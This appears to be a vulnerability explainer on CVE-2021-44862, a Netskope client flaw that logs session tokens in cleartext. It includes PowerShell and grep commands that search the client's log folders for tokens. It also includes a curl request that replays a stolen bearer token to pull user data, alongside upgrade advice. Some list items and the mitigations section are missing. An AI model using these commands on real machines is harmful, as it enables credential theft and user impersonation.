Security vulnerabilities that seem minor can have big consequences—especially when they expose sensitive user information. CVE-2021-44862 is one such vulnerability affecting the Netskope client. This issue lets a local, authenticated attacker access private data stored in NSClient logs, mainly because sensitive information isn't hidden or removed before it's written into these logs. In this article, we’ll explain how this vulnerability works, how it can be exploited, and what you need to do to stay protected.
What is CVE-2021-44862?
CVE-2021-44862 is a local information disclosure vulnerability in the Netskope client. When certain operations are performed, the client logs sensitive information (like access tokens, user IDs, or session data) into the NSClient log files without sanitizing it. If an attacker has access to a workstation running the client, they can read these logs and steal data that should have remained private.
Sensitive tokens and identifiers can let attackers act as if they are other users.
- Attackers can download corporate data, access restricted systems, or monitor user activities by leveraging this leaked information.
References
- Netskope Official Advisory
- NIST National Vulnerability Database – CVE-2021-44862
- Packet Storm Security Advisory
How Does the Vulnerability Work?
The vulnerability exists due to improper logging practices.
A user logs into the Netskope client on their machine.
2. The client performs actions that involve session tokens or other sensitive authentication information.
3. Instead of masking these sensitive fields, the client writes them directly into log files, typically stored in paths like C:\ProgramData\Netskope\NSClient\logs\.
4. Another person with access to this computer (say, another employee or a malicious local user) can browse to these logs and read sensitive data.
Here’s a sample of what a vulnerable log entry might look like
2021-10-20 08:15:32 INFO [SessionManager] User jdoe authenticated with access token: eyJhbGciOiJIUzI1...
2021-10-20 08:15:33 DEBUG [DownloadManager] Download started for user_id: jdoe, session_id: 52hj1.y190f...
Sensitive data in cleartext:
User IDs
Anyone who sees these log lines can copy the token, use API calls, or impersonate jdoe.
Step 1: Gaining Local Access
The attacker must have a valid account on the target machine (even a restricted local account).
The logs are usually found here
C:\ProgramData\Netskope\NSClient\logs\
or on macOS/Linux
/Library/Application Support/Netskope/NSClient/logs/
On Windows (using PowerShell)
Select-String -Path "C:\ProgramData\Netskope\NSClient\logs\*" -Pattern "token|session_id" | Select-Object -First 10
On Linux/macOS
grep -E 'token|session_id' /Library/Application\ Support/Netskope/NSClient/logs/* | head -10
Suppose the attacker finds this in the log
Authenticated with access token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
The attacker can then craft an API request
curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
https://acme.netskope.com/api/v1/download/user_data
Impersonating the legitimate user, the attacker gains unauthorized access to sensitive data.
Remediation
Best Fix:
Upgrade the Netskope client to the latest version. Netskope fixed the issue by making sure sensitive values are never logged.
Other Mitigations:
Conclusion
CVE-2021-44862 is a clear reminder that even local vulnerabilities can be high risk, especially in environments where multiple users access the same machine. Logs should never contain unprotected sensitive information, and software vendors must sanitize logs before writing them. Upgrade your Netskope client now, review your log access policies, and stay vigilant.
If you found this helpful, make sure to check the links above for more technical details and the latest advisories.
*Stay secure, and always keep an eye on your logs!*
Timeline
Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 13:28:00 UTC